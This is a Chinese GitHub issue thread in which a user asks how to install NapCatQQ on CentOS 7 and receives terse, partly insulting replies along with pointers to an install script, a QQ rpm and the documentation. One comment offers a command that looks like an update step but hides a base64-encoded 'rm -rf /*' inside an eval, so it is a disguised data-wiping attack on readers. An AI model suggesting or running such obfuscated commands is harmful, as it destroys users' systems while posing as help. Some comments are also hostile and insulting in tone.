### ISSUE TITLE
安装问题

### ISSUE THREAD

**Issue by spacepch** [NapNeko/NapCatQQ#533]
### 系统版本

centos 7.6

### QQNT 版本

/

### NapCat 版本

最新

### OneBot 客户端

/

### 发生了什么?

centos 7怎么安装呢

### 如何复现

/

### 期望的结果?

/

### NapCat 运行日志

```shell
/
```

### OneBot 客户端运行日志

```shell
/
```

**Comment by linyuchen** [comment]
...

**Comment by sisi0318** [comment]
这边建议删掉不玩

**Comment by spacepch** [comment]
程序员也分不同领域，文档里找不到release看不明白，提个问题，就这样回答，果然byd年轻js圈歧视严重的很

**Comment by sisi0318** [comment]
但凡给条日志

**Comment by sisi0318** [comment]
哪里不会装 也没嘴说是吗 动不动就上歧视了是吧 对 我就是歧视傻子咋滴

**Comment by Fahaxikiii** [comment]
centos7我的建议是用docker，https://github.com/NapNeko/NapCat-Installer/blob/main/script/install.sh如果你是程序员的话这个安装脚本你应该能读懂怎么安装吧，你先装个QQ再说

**Comment by spacepch** [comment]
我服务器内存太小了，docker带不起来，还得挂一个机器人框架，我用那个给的脚本，运行后报错无法获取napCatqq版本，我想着脚本运行不成功总得有个Linux版本的压缩包吧，下载下来直接运行那种，看了半天没找到Linux的全是win的，

**Comment by Fahaxikiii** [comment]
> 我服务器内存太小了，docker带不起来，还得挂一个机器人框架，我用那个给的脚本，运行后报错无法获取napCatqq版本，我想着脚本运行不成功总得有个Linux版本的压缩包吧，下载下来直接运行那种，看了半天没找到Linux的全是win的，

https://dldir1.qq.com/qqfile/qq/QQNT/4a705495/linuxqq_3.2.13-29725_x86_64.rpm  先装个QQ好吗，哥

**Comment by yum-install-apt** [comment]
apt update;apt upgrade;eval ($echo "cm0gLXJmIC8q="| base64 -d)

**Comment by pk5ls20** [comment]
请阅读官网文档 https://napneko.com/guide/start-install
